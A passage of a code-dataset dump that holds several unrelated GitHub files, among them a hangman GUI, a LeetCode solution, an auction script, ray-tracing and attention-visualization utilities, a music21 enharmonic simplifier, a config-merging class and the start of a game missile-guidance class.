width=LARGEUR_DE_CANVAS, bd=0, highlightthickness=0)\ngraphique.create_text(LARGEUR_DE_CANVAS/2, HAUTEUR_DE_CANVAS/2, text=dessinPendu(0), fill=\"white\", font=(\"Helvetica\", 30))\ngraphique.pack()\n\nmotCache = Label(boiteGraphique, text=texteMotCache, font=(\"Helvetica\", 20), bg=COULEUR_DE_FOND, fg=\"white\")\nmotCache.pack()\n\nboiteGraphique.pack(side=TOP) \n\nboiteInput = Frame(root, bg=COULEUR_DE_FOND) # Création de la boîte qui contiendra l'input et la liste des lettres déjà rentrées\n\nentree = Entry(boiteInput, font=(\"Helvetica\", 20), bg=\"white\", fg=COULEUR_DE_FOND) # Création de la zone où l'on entre les lettres\nentree.pack(side=TOP)\n\nbouton = Button(boiteInput, text=\"Valider la lettre\", font=(\"Helvetica\", 20), bg=COULEUR_DE_FOND, fg=\"white\", command=ValideLettre)\nbouton.pack(side=TOP)\n\nboiteInput.pack()\n\nroot.mainloop()\n","repo_name":"LeGrandCthulhu/Pendu","sub_path":"Fenêtre (Pas fini)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35159496268","text":"class Solution:\n def productExceptSelf(self, nums: list[int]) -> list[int]:\n n = len(nums)\n pre_product = [1]*n\n for i in range(1, n):\n pre_product[i] = pre_product[i-1]*nums[i-1]\n suf_product = [1]*n\n for i in range(n-2, -1, -1):\n suf_product[i] = suf_product[i+1]*nums[i+1]\n result = []\n for i in range(n):\n result.append(pre_product[i]*suf_product[i])\n\n return result\n\n\nif __name__ == '__main__':\n nums = [1, 2, 3, 4]\n print(f\"{nums}\")\n print('----------Answer Below----------')\n print(Solution().productExceptSelf(nums))\n","repo_name":"showboy0704/leetcode","sub_path":"Data Structure/Array/238_array_product_except_self.py","file_name":"238_array_product_except_self.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2228091245","text":"from art import logo\nimport os\n\nclear = lambda: os.system('clear')\n\n# Starting the auction with logo\nprint(\"Welcome to Bajpai Island!\\nWe are here to auction paintings by Suyash Bajpai!\")\nprint(logo)\nprint(\"\\n==============================================================\")\n\n# Items Dictionary\npaintings = {\"Mona Lisa\" : None, \"Invincible\": None, \"La Lisa\": None, \"Legendary\": None}\npaintings_sold_info = paintings.copy()\n\npainting_list = list(paintings.keys())\nnumOfItems = len(painting_list)\n\ndef ask():\n bidder = input(\"What is your name?\")\n bid = int(input((\"What is your bid: $\")))\n bidder_available = input(\"Is there any other bidder for this painting?\\nType 'yes/y' or 'no/n\")\n return bidder, bid, bidder_available\n\n# Check a list of dictionaries for the maximum bid \ndef decide(info):\n maxBid = 0 \n maxBidIdx = -1\n for idx, bidder in enumerate(info):\n currBid = int(bidder['bid'])\n if currBid > maxBid:\n maxBid = currBid\n maxBidIdx = idx\n return info[maxBidIdx]\n\nwhile numOfItems > 0:\n currItemNum = 5 - numOfItems\n print(f\"Bid for Painting#{currItemNum}\")\n print(f\"This painting is called: {painting_list[currItemNum-1]}\")\n bidder_available = input(\"Is there any bidder for this painting?\\nType 'yes/y' or 'no/n'\\n\")\n if bidder_available == 'yes' or bidder_available == 'y':\n info = []\n while True:\n if bidder_available == 'yes' or bidder_available == 'y': \n name, amount, bidder_available = ask()\n print(\"\")\n info.append({'name': name, 'bid': amount})\n else:\n break\n paintings[painting_list[currItemNum-1]] = info\n clear()\n else:\n print(\"=======================================================\")\n numOfItems -= 1\n continue\n print(\"=======================================================\")\n paintings_sold_info[painting_list[currItemNum-1]] = decide(paintings[painting_list[currItemNum-1]])\n numOfItems -= 1\n clear()\n \n# Pretty Print\nnumOfItems = len(painting_list)\nprint(\"Auction Ends! Immense Gratitude for Mr. Suyash Bajpai.\\nThank you all for coming.\\nCongratulations to all the buyers.\")\nwhile numOfItems > 0:\n currItemNum = 5 - numOfItems\n print(f\"\\n#{currItemNum}\")\n if paintings_sold_info[painting_list[currItemNum-1]] is None:\n print(f\"{painting_list[currItemNum-1]} remains unsold!\")\n numOfItems -= 1\n continue\n print(f\"{painting_list[currItemNum-1]} sold to {paintings_sold_info[painting_list[currItemNum-1]]['name']} for ${paintings_sold_info[painting_list[currItemNum-1]]['bid']}\")\n numOfItems -= 1","repo_name":"sypai/100DaysOfPython","sub_path":"Day9/auction.py","file_name":"auction.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"23171172326","text":"\"\"\"\ns Testing the absorption material on 1 sphere with a cone beam\n\"\"\"\n\nimport logging\nlogging.getLogger('trimesh').disabled = True\nlogging.getLogger('shapely.geos').disabled = True\nlogging.getLogger('matplotlib').setLevel(logging.CRITICAL)\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pvtrace import *\n\nworld = Node(\n name=\"world (air)\",\n geometry=Sphere(\n radius=10.0,\n material=Material(refractive_index=1.0,\n\n )\n )\n)\n\n# sphere = Node(\n# name=\"sphere (abs)\",\n# geometry=Sphere(\n# radius=1.0,\n# material=Material(\n# refractive_index=1.5,\n# components=[\n#\n# Absorber(coefficient=12.1)\n# ]\n# ),\n# ),\n# parent=world\n# )\n# sphere = Node(\n# name=\"sphere (glass)\",\n# geometry=Sphere(\n# radius=0.8,\n# material=Material(\n# refractive_index=1.0,\n# components=[\n# Scatterer(coefficient=4.1)\n# ]\n#\n# ),\n# ),\n# parent=world\n# )\nbox = Node(\n name=\"box_1\",\n geometry=Box(\n (2.0, 2.0, 0.5),\n material=Material(refractive_index=20.5),\n ),\n parent=world\n)\n# box.translate((0.0, 0.0, 0.0))\nray = Ray(\n position=(-1.0, 0.0, 0.9),\n direction=(1.0, 0.0, 0.0),\n wavelength=555.0\n)\nimport functools\n\nlight = Node(\n name=\"Light (555nm)\",\n light=Light(direction=functools.partial(cone, np.pi / 32)),\n parent=world\n)\nlight.translate((0.0, 0.0, 3))\nlight.rotate(np.pi, [1, 0, 0])\nscene = Scene(world)\nnp.random.seed(0)\nvis = MeshcatRenderer(wireframe=True, open_browser=True)\nfor ray in scene.emit(40):\n steps = photon_tracer.follow(scene, ray)\n path, decisions = zip(*steps)\n # for position in path[0].position\n vis.add_ray_path(path)\n\nvis.render(scene)\nimport time\ntime.sleep(10)\n","repo_name":"xdshiro/ray_tracing","sub_path":"test_sphere.py","file_name":"test_sphere.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22458680011","text":"\"\"\"Utils\nCreated: Nov 11,2019 - Yuchong Gu\nRevised: Dec 03,2019 - Yuchong Gu\n\"\"\"\nimport torch\nimport random\nimport os\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm_notebook as tqdm\n\nclass CenterLoss(nn.Module):\n def __init__(self):\n super(CenterLoss, self).__init__()\n self.l2_loss = nn.MSELoss(reduction='sum')\n\n def forward(self, outputs, targets):\n return self.l2_loss(outputs, targets) / outputs.size(0)\n\ndef batch_augment(images, attention_map, mode='crop', theta=0.5, padding_ratio=0.1):\n batches, _, imgH, imgW = images.size()\n\n if mode == 'crop':\n crop_images = []\n for batch_index in range(batches):\n atten_map = attention_map[batch_index:batch_index + 1]\n if isinstance(theta, tuple):\n theta_c = random.uniform(*theta) * atten_map.max()\n else:\n theta_c = theta * atten_map.max()\n\n crop_mask = F.upsample_bilinear(atten_map, size=(imgH, imgW)) >= theta_c\n nonzero_indices = torch.nonzero(crop_mask[0, 0, ...])\n\n height_min = max(int(nonzero_indices[:, 0].min().item() - padding_ratio * imgH), 0)\n height_max = min(int(nonzero_indices[:, 0].max().item() + padding_ratio * imgH), imgH)\n width_min = max(int(nonzero_indices[:, 1].min().item() - padding_ratio * imgW), 0)\n width_max = min(int(nonzero_indices[:, 1].max().item() + padding_ratio * imgW), imgW)\n\n crop_images.append(\n F.upsample_bilinear(images[batch_index:batch_index + 1, :, height_min:height_max, width_min:width_max],\n size=(imgH, imgW)))\n crop_images = torch.cat(crop_images, dim=0)\n return crop_images\n\n elif mode == 'drop':\n drop_masks = []\n for batch_index in range(batches):\n atten_map = attention_map[batch_index:batch_index + 1]\n if isinstance(theta, tuple):\n theta_d = random.uniform(*theta) * atten_map.max()\n else:\n theta_d = theta * atten_map.max()\n\n drop_masks.append(F.upsample_bilinear(atten_map, size=(imgH, imgW)) < theta_d)\n drop_masks = torch.cat(drop_masks, dim=0)\n drop_images = images * drop_masks.float()\n return drop_images\n\n else:\n raise ValueError('Expected mode in [\\'crop\\', \\'drop\\'], but received unsupported augmentation method %s' % mode)\n\n\ndef visualize_attention(model, dataset, device, visualize_save_path, batch_size=16):\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,shuffle=True)\n ToPILImage = transforms.ToPILImage()\n MEAN = torch.tensor([0.485, 0.456, 0.406]).view(1, 3, 1, 1)\n STD = torch.tensor([0.229, 0.224, 0.225]).view(1, 3, 1, 1)\n fakehaimgs = []\n realhaimgs = []\n\n for i, (inputs, labels) in tqdm(enumerate(dataloader),total=len(dataloader)):\n inputs = inputs.to(device)\n preds, _, attention_maps = model(inputs)\n attention_maps = F.upsample_bilinear(attention_maps, size=(inputs.size(2), inputs.size(3)))\n attention_maps = torch.sqrt(attention_maps.cpu() / attention_maps.max().item())\n\n heat_attention_maps = generate_heatmap(attention_maps)\n raw_image = inputs.cpu() * STD + MEAN\n heat_attention_image = raw_image * 0.5 + heat_attention_maps * 0.5\n raw_attention_image = raw_image * attention_maps\n\n for batch_idx in range(inputs.size(0)):\n rimg = ToPILImage(raw_image[batch_idx])\n raimg = ToPILImage(raw_attention_image[batch_idx])\n haimg = ToPILImage(heat_attention_image[batch_idx])\n rimg.save(os.path.join(visualize_save_path, '%03d_raw.jpg' % (i * batch_size + batch_idx)))\n raimg.save(os.path.join(visualize_save_path, '%03d_raw_atten.jpg' % (i * batch_size + batch_idx)))\n haimg.save(os.path.join(visualize_save_path, '%03d_heat_atten.jpg' % (i * batch_size + batch_idx)))\n if labels[batch_idx] == 0:\n fakehaimgs.append(haimg)\n else: \n realhaimgs.append(haimg)\n\n _, axes = plt.subplots(nrows=2, ncols=5, figsize=(24, 10))\n for idx, image in enumerate(fakehaimgs[:5], start=0):\n axes.ravel()[idx].imshow(image)\n axes.ravel()[idx].axis('off')\n axes.ravel()[idx].set_title(\"Label:Fake\")\n plt.tight_layout()\n\n for idx, image in enumerate(realhaimgs[:5], start=5):\n axes.ravel()[idx].imshow(image)\n axes.ravel()[idx].axis('off')\n axes.ravel()[idx].set_title(\"Label:Real\")\n plt.tight_layout()\n\ndef generate_heatmap(attention_maps):\n heat_attention_maps = []\n heat_attention_maps.append(attention_maps[:, 0, ...]) # R\n heat_attention_maps.append(attention_maps[:, 0, ...] * (attention_maps[:, 0, ...] < 0.5).float() + \\\n (1. - attention_maps[:, 0, ...]) * (attention_maps[:, 0, ...] >= 0.5).float()) # G\n heat_attention_maps.append(1. - attention_maps[:, 0, ...]) # B\n return torch.stack(heat_attention_maps, dim=1)\n","repo_name":"aides9/deepfake_video_detection","sub_path":"Utils/Wsdan_utils.py","file_name":"Wsdan_utils.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32127634931","text":"print(\"\\nCALCULO DE LA MEDIA ARITMETICA\")\n\nlis_num = []\n\nprint (\"Ingrese los valores, (ingrese un numero negativo para cerrar)\")\nwhile True: \n\ttry: \n\t\tnum = float(input(\"-> \"))\n\t\tif num >= 0:\n\t\t\tlis_num.append(num)\t\t\t\t\n\t\telse:\n\t\t\tbreak\n\texcept ValueError:\n\t\tprint (\"Error, ingrese un numero\")\n\t\tcontinue\n\nn_valores = len(lis_num)\nsuma_valores = sum(lis_num)\n\nprint (f\"Media Aritmetica es: \")\nprint (f\"Valores ingresado: {lis_num} = {suma_valores}\")\nprint (f\"Cantidad de Valores ingresados = {n_valores}\")\nprint (f\"El calculo es: {suma_valores} / {n_valores} = {suma_valores/n_valores}\" )\n","repo_name":"Chess10/PYTHON","sub_path":"FUNDAMENTOS DE PROGRAMACION/1. Fundamentos Basicos/EJERCICIOS/Media Aritmetica.py","file_name":"Media Aritmetica.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39946553105","text":"import difflib\nfrom colorama import Fore, Back, Style, init\nimport yaml\nfrom mergedb.merge_functions.dict import deep_merge, simple_merge\nfrom mergedb.merge_functions.merge_controller import DeepMergeController, KeyedArrayMergeRule\nfrom mergedb.errors import MdbDeclarationError\ninit()\n\n\nclass Declaration(object):\n\n def __init__(self,\n layer_path,\n base_declaration,\n inherited_declarations: list = None,\n inherited_config: dict = None,\n database=None):\n \"\"\"\n A declaration instance contains a base_declaration (any declaration for which a build is specified), all of the\n layers it inherits, and any configuration that is inherited from a higher up object.\n\n :param layer_path:\n File path that the declaration was loaded from\n\n :param base_declaration:\n The declaration dict that the merge is performed on\n\n :param inherited_declarations:\n Any other layers that this declaration inherits\n\n :param inherited_config:\n If mergedb config options are specified on an inherited object, they are passed here (and will be overridden\n by what is found in the base_declaration, if present.)\n \"\"\"\n self.database = database\n self.layer_path = layer_path\n self.short_name = layer_path.split(\"/\")[-1]\n self.base = base_declaration\n if inherited_declarations:\n self.inherited = inherited_declarations\n else:\n self.inherited = []\n if inherited_config:\n self.inherited_config = inherited_config\n else:\n self.inherited_config = {}\n self.merge_history = []\n self.merge_rules = []\n self.config = self.set_config()\n self.load_merge_rules()\n self.merge_controller = self.load_merge_controller()\n\n def __repr__(self):\n return f\"\"\n\n def get_name(self):\n \"\"\"\n Strips the extension off of the name and returns it.\n\n :return:\n Short name of the dictionary without file extension\n \"\"\"\n return self.short_name.split('.')[0]\n\n def load_merge_controller(self):\n if 'knockout' in self.config:\n knockout = self.config['knockout']\n else:\n knockout = None\n return DeepMergeController(list_merge_rules=self.merge_rules, knockout=knockout)\n\n def load_merge_rules(self):\n if 'merge_rules' in self.config:\n if 'keyed_array' in self.config['merge_rules']:\n for rule_config in self.config['merge_rules']['keyed_array']:\n if 'path' in rule_config:\n path = rule_config['path']\n else:\n path=[]\n if 'attribute' not in rule_config or 'key' not in rule_config:\n raise MdbDeclarationError(msg=f\"['path', 'attribute'] are required for keyed_array merge rules\")\n rule = KeyedArrayMergeRule(path, rule_config['attribute'], rule_config['key'])\n self.merge_rules.append(rule)\n\n def load_inherited_from_config(self):\n if 'inherit' in self.config:\n for path in self.config['inherit']:\n try:\n self.inherited.append(self.database.load_declaration(path))\n except MdbDeclarationError as e:\n raise MdbDeclarationError(f\"{self.layer_path} tried to load inherited layer {path}, but was unable: {e}\")\n\n def set_config(self):\n \"\"\"\n This method deep merges the inherited config into the base config, if present\n\n :return:\n The merged config dict\n \"\"\"\n base_config = {}\n if 'mergedb' in self.base:\n base_config = self.base['mergedb']\n # Remove the mergedb key from base if present\n del(self.base['mergedb'])\n return deep_merge(self.inherited_config, base_config)\n\n def merge_inherited(self):\n \"\"\"\n This method performs a top-down merge from self.inherited down to self.base in the manner prescribed by the\n config.\n\n :return:\n The merged dict\n \"\"\"\n # Clear the history in case someone is importing and calling this method more than once\n self.merge_history = []\n # Todo: Implement a callback system and get this merge_history appending BS out of this method\n current = {}\n if self.inherited:\n for declaration in self.inherited:\n if not current:\n self.merge_history.append(f\"{Fore.BLUE}Initial Layer {declaration.layer_path}:{Fore.RESET}\")\n self.merge_history.append(\"====================================\")\n self.merge_history.append(yaml.dump(declaration.base))\n current = declaration.base\n else:\n self.merge_history.append(f\"{Fore.BLUE}Merge Layer {declaration.layer_path}:{Fore.RESET}\")\n self.merge_history.append(\"====================================\")\n current_lines = yaml.safe_dump(current).split('\\n')\n current = self.merge_controller.merge(current, declaration.base)\n post_lines = yaml.safe_dump(current).split('\\n')\n for line in difflib.ndiff(current_lines, post_lines):\n self.merge_history.append(self._colorize_diff(line))\n self.merge_history.append(f\"{Fore.BLUE}Merge Layer {self.layer_path}:{Fore.RESET}\")\n self.merge_history.append(\"====================================\")\n current_lines = yaml.safe_dump(current).split('\\n')\n post = self.merge_controller.merge(current, self.base)\n post_lines = yaml.safe_dump(post).split('\\n')\n for line in difflib.ndiff(current_lines, post_lines):\n self.merge_history.append(self._colorize_diff(line))\n self.merge_history.append(\"Final Result\")\n self.merge_history.append(\"====================================\")\n self.merge_history.append(yaml.safe_dump(post))\n return post\n\n @staticmethod\n def _colorize_diff(line):\n \"\"\"\n Diff output is run through this method one line at a time in order to colorize it for context\n\n :param line:\n One line of diff output\n\n :return:\n One line of diff output, possibly wrapped in color\n \"\"\"\n if line.startswith('+'):\n return Fore.GREEN + line + Fore.RESET\n elif line.startswith('-'):\n return Fore.RED + line + Fore.RESET\n elif line.startswith('^') or line.startswith('?'):\n return Fore.CYAN + line + Fore.RESET\n else:\n return line\n\n def print_history(self):\n \"\"\"\n Prints self.merge_history to stdout\n \"\"\"\n for line in self.merge_history:\n print(line)","repo_name":"graysonhead/mergedb","sub_path":"mergedb/data_types/declaration.py","file_name":"declaration.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"14187866216","text":"from __future__ import annotations\n\nimport itertools\nfrom math import inf\nimport unittest\n\nfrom music21 import environment\nfrom music21 import pitch\nfrom music21 import musedata\n\nenvironLocal = environment.Environment('analysis.enharmonics')\n\n\nclass EnharmonicScoreRules:\n def __init__(self):\n self.sameStaffLine = False\n self.alterationPenalty = 4\n self.augDimPenalty = 2\n self.mixSharpsFlatsPenalty = False\n\nclass ChordEnharmonicScoreRules(EnharmonicScoreRules):\n def __init__(self):\n super().__init__()\n self.mixSharpsFlatsPenalty = 2\n\nclass EnharmonicSimplifier:\n '''\n Takes any pitch list input and returns the best enharmonic respelling according to the input\n criteria and rule weightings.\n Those criteria and rule weightings are currently fixed, but in future the user should be able\n to select their own combination and weighting of rules according to preferences,\n with predefined defaults for melodic and harmonic norms.\n Note: EnharmonicSimplifier itself returns nothing.\n '''\n def __init__(self, pitchList, ruleClass=EnharmonicScoreRules):\n if isinstance(pitchList[0], str):\n pitchList = [pitch.Pitch(p) for p in pitchList]\n\n self.pitchList = pitchList\n self.ruleObject = ruleClass()\n self.allPossibleSpellings = None\n self.allSpellings = []\n self.getRepresentations()\n\n def getRepresentations(self):\n '''\n Takes a list of pitches or pitch names and retrieves all enharmonic spellings.\n Note: getRepresentations itself returns nothing.\n '''\n allSpellings = []\n for p in self.pitchList:\n spellings = [p] + p.getAllCommonEnharmonics(1)\n allSpellings.append(spellings)\n self.allSpellings = allSpellings\n\n def getProduct(self):\n self.allPossibleSpellings = list(itertools.product(*self.allSpellings))\n return self.allPossibleSpellings\n\n def bestPitches(self):\n '''\n Returns a list of pitches in the best enharmonic\n spelling according to the input criteria.\n\n >>> pList1 = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n >>> es = analysis.enharmonics.EnharmonicSimplifier(pList1)\n >>> es.bestPitches()\n (, , )\n >>> pList2 = ['D--', 'E', 'F##']\n >>> es = analysis.enharmonics.EnharmonicSimplifier(pList2)\n >>> es.bestPitches()\n (, , )\n '''\n self.getProduct()\n bestPitches = []\n minScore = inf\n for possibility in self.allPossibleSpellings:\n thisAugDimScore = self.getAugDimScore(possibility)\n thisAlterationScore = self.getAlterationScore(possibility)\n thisMixSharpsFlatScore = self.getMixSharpFlatsScore(possibility)\n thisScore = thisAugDimScore + thisAlterationScore + thisMixSharpsFlatScore\n if thisScore < minScore:\n minScore = thisScore\n bestPitches = possibility\n return bestPitches\n\n def getAlterationScore(self, possibility):\n '''\n Returns a score according to the number of sharps and flats in a possible spelling.\n The score is the sum of the flats and sharps + 1, multiplied by the alterationPenalty.\n '''\n if self.ruleObject.alterationPenalty is False:\n return 1\n\n joinedPossibility = ''.join([p.name for p in possibility])\n flatCount = joinedPossibility.count('-')\n sharpCount = joinedPossibility.count('#')\n score = (flatCount + sharpCount + 1) * self.ruleObject.alterationPenalty\n return score\n\n def getMixSharpFlatsScore(self, possibility):\n '''\n Returns a score based on the mixture of sharps and flats in a possible spelling:\n the score is given by the number of the lesser used accidental (sharps or flats)\n multiplied by the mixSharpsFlatsPenalty.\n '''\n if self.ruleObject.mixSharpsFlatsPenalty is False:\n return 1\n\n joinedPossibility = ''.join([p.name for p in possibility])\n flatCount = joinedPossibility.count('-')\n sharpCount = joinedPossibility.count('#')\n score = min([flatCount, sharpCount]) * self.ruleObject.mixSharpsFlatsPenalty\n return score\n\n def getAugDimScore(self, possibility):\n '''\n Returns a score based on the number of augmented and diminished intervals between\n successive pitches in the given spelling.\n '''\n if self.ruleObject.augDimPenalty is False:\n return 1\n\n intervalStr = ''\n for i in range(len(possibility) - 1):\n p0 = musedata.base40.base40Representation[possibility[i].name]\n p1 = musedata.base40.base40Representation[possibility[i + 1].name]\n base40diff = (p1 - p0) % 40\n intervalStr += musedata.base40.base40IntervalTable.get(base40diff, 'ddd')\n dimCount = intervalStr.count('A')\n augCount = intervalStr.count('d')\n score = (dimCount + augCount + 1) * self.ruleObject.augDimPenalty\n return score\n\n# ------------------------------------------------------------------------------\nclass Test(unittest.TestCase):\n\n def testBestPitches(self):\n pList = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n es = EnharmonicSimplifier(pList)\n bestPitchList = es.bestPitches()\n\n self.assertEqual(len(pList), 3)\n self.assertEqual(len(bestPitchList), 3)\n self.assertIsInstance(bestPitchList[0], pitch.Pitch)\n\n def testGetAlterationScore(self):\n pList = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n es = EnharmonicSimplifier(pList)\n poss = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n testAltScore = es.getAlterationScore(poss)\n\n self.assertEqual(len(pList), 3)\n self.assertIsInstance(testAltScore, int)\n\n def testGetMixSharpFlatsScore(self):\n pList = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n es = EnharmonicSimplifier(pList)\n poss = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n testMixScore = es.getMixSharpFlatsScore(poss)\n\n self.assertEqual(len(pList), 3)\n self.assertIsInstance(testMixScore, int)\n\n def testGetAugDimScore(self):\n pList = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n es = EnharmonicSimplifier(pList)\n poss = [pitch.Pitch('C'), pitch.Pitch('D'), pitch.Pitch('E')]\n testAugDimScore = es.getAugDimScore(poss)\n\n self.assertEqual(len(pList), 3)\n self.assertIsInstance(testAugDimScore, int)\n\n\n# -----------------------------------------------------------------------------\nif __name__ == '__main__':\n import music21\n music21.mainTest(Test)\n","repo_name":"cuthbertLab/music21","sub_path":"music21/analysis/enharmonics.py","file_name":"enharmonics.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":1878,"dataset":"github-code","pt":"72"} +{"seq_id":"24853694786","text":"import collections\n\n#Q1\ndef q1(big_list):\n count = 0\n for i in big_list:\n for j in range(len(i)):\n count += i[j]\n return count\n\n\n#Q2A\ndef hailstone(n):\n while n > 1:\n if n % 2 == 0:\n n = int(n/2)\n else:\n n = n * 3 + 1\n yield n\n\n\n#2B\ngenerator = (i for i in hailstone(11))\nfor i in generator:\n print(int(i), end=' ')\nprint(\" \")\n\n\n#2C\nclass Gen:\n def __init__(self, data):\n self.num = data\n\n def __next__(self):\n if self.num == 1:\n raise StopIteration\n\n if self.num % 2 == 0:\n self.num = int(self.num / 2)\n else:\n self.num = int(self.num*3 + 1)\n\n return self.num\n\n def __iter__(self):\n return self\n\n\n#Q3\ndef reachable(graph, node):\n c = collections.deque([node])\n list_set = [node]\n while c:\n node = c.popleft()\n for i in graph[node]:\n if i not in list_set:\n c.appendleft(i)\n list_set.append(i)\n return list_set\n\n\n#Q5A\ndef q5a():\n i = 2\n print(\"id before:\", id(i))\n i = 8\n print(\"id after:\", id(i))\n\n\n#5B\nclass mutableInt(int):\n def _init_(self, value):\n self.value = value\n\n def _call_(self, value):\n self.value = value\n\n def _str_(self):\n return str(self.value)\n\n\n#Q7A\ndef q7(number_list):\n less_than = list(filter(lambda x: x < 12, number_list))\n sum = 0\n for i in less_than:\n sum = sum + (2 ** i)\n return sum\n\n\n#7C\ndef get_max_camera(cameras):\n from functools import reduce\n return reduce(lambda x, y: x if x[1] > y[1] else y, cameras)\n\n\n#7B\ndef get_max_rez(cameras):\n return cameras[get_max_camera(cameras)][1]\n\n\n\n#test\n#q2\nfor num in hailstone(5):\n print(num)\n\ngen = Gen(5)\nfor i in gen:\n print(int(i), end=' ')\nprint(\" \")\n\n#q5\nq5a()\ni = mutableInt(5)\nprint(\"id before:\", id(i))\ni._call_(8)\nprint(\"id after:\", id(i))\n\n#q7\nnum_list = [1, 6, 17, 20]\nprint(q7(num_list))\n\n","repo_name":"lirshindalman/Phyton-Project","sub_path":"Introduction/HW2/HW2.py","file_name":"HW2.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19750164830","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport re\nimport os\nimport sys\nimport argparse\nfrom teimedlib.clean_text import clean_text\nfrom teimedlib.ualog import Log\n\n__date__ = \"29-11-2022\"\n__version__ = \"0.0.1\"\n__author__ = \"Marta Materni\"\n\n\ndef check_open_close_tag(text_path, tag_open, tag_close):\n text = open(text_path, \"r\").read()\n text = clean_text(text)\n ptr_op = f\"&{tag_open};\"\n ptr_cl = f\"&{tag_close};\"\n ptr = fr\"({ptr_op})|({ptr_cl})\"\n lst = []\n n = 0\n oc = 0\n err = False\n for m in re.finditer(ptr, text):\n s = m.group()\n x0 = m.start()\n x1 = m.end() + 50\n t = text[x0:x1]\n if s == ptr_op:\n n += 1\n if oc != 0:\n lst.append(f\"ERROR\\n\")\n err = True\n oc = 0\n lst.append(f\"\\n{n}\")\n oc += 1\n if s == ptr_cl:\n oc -= 1\n lst.append(t)\n\n log_path = text_path.replace(\".txt\", f\"_{tag_open}_{tag_close}.log\")\n if err:\n log_path = log_path.replace(\".log\", \"_ERR.log\")\n log = Log(\"w\").open(log_path, 1).log\n for x in lst:\n log(x)\n\n\ndef do_main(text_path, tag_open, tag_close):\n check_open_close_tag(text_path, tag_open, tag_close)\n\n\n# text_path = \"tr_gre_teimed_005.txt\"\n# tag_open = \"&chB;\"\n# tag_close = \"&chE;\"\n# do_main(text_path, tag_open, tag_close)\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n if len(sys.argv) == 1:\n print(\"release: %s %s\" % (__version__, __date__))\n parser.print_help()\n sys.exit(1)\n parser.add_argument('-t',\n dest=\"txt_path\",\n required=True,\n default=None,\n type=str,\n metavar=\"files match\",\n help=\"-t \")\n parser.add_argument('-o',\n dest=\"op\",\n required=True,\n metavar=\"\",\n help='-o ')\n parser.add_argument('-c',\n dest=\"cl\",\n required=True,\n metavar=\"\",\n help='-c ')\n args = parser.parse_args()\n do_main(args.txt_path, args.op, args.cl)\n","repo_name":"gmaterni/teimed","sub_path":"checkopenclose.py","file_name":"checkopenclose.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31003284959","text":"from local_embedder.DB_handler import serialize_document_to_database\nimport argparse\nimport os\nimport glob\nimport pypdfium2 as pdfium\nfrom tqdm import tqdm\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--dir\", help=\"Directory containing knowledge in pdfs\")\nargs = parser.parse_args()\n\ndef getAllText(pdf_path: str):\n pdf_doc = pdfium.PdfDocument(pdf_path)\n text = \"\"\n for page_num in range(len(pdf_doc)):\n text += pdf_doc.get_page(page_num).get_textpage().get_text_range()\n pdf_doc.close()\n return text\n\n\ndef main():\n # Your code here\n pdf_files = glob.glob(os.path.join(args.dir, \"**/*.pdf\"), recursive=True)\n for pdf in tqdm(pdf_files):\n pdf_text = getAllText(pdf)\n bookName = pdf.strip().split(os.sep)[-1][:-4]\n serialize_document_to_database(pdf_text, bookName)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"XccelerateOrg/VectorDB_Storage_Retrieval","sub_path":"make_knowledge_DB.py","file_name":"make_knowledge_DB.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7882880039","text":"from math import sin, cos, atan2, sqrt, acos, asin, pi\nfrom random import random, randint\n\nclass Missile():\n \"\"\" class for missile object\n \"\"\"\n def __init__(self, x, y, vx, vy, turn_speed, burn_duration, burn_acc, fps, guidance_mode=1):\n \"\"\" everything is in px and s\n plane_pos is needed to determine a init position close to the plane\n burn_duration in ticks\n turn_speed in deg/tick\n \"\"\"\n self.x = x\n self.y = y\n self.v =[vx, vy]\n self.burn_duration = burn_duration\n self.burn_acc = burn_acc\n self.burned = 0\n self.omega = turn_speed # deg/s\n self.turn_drag = -70 # px /s/s, max drag\n self.guidance_mode = guidance_mode\n self.fps = fps\n self.dt = 1.0/fps\n self.alive = True\n self.hit = False\n self.p_last = []\n self.m_last = []\n\n\n def pure_guidance(self, plane):\n \"\"\" (Plane) -> void\n 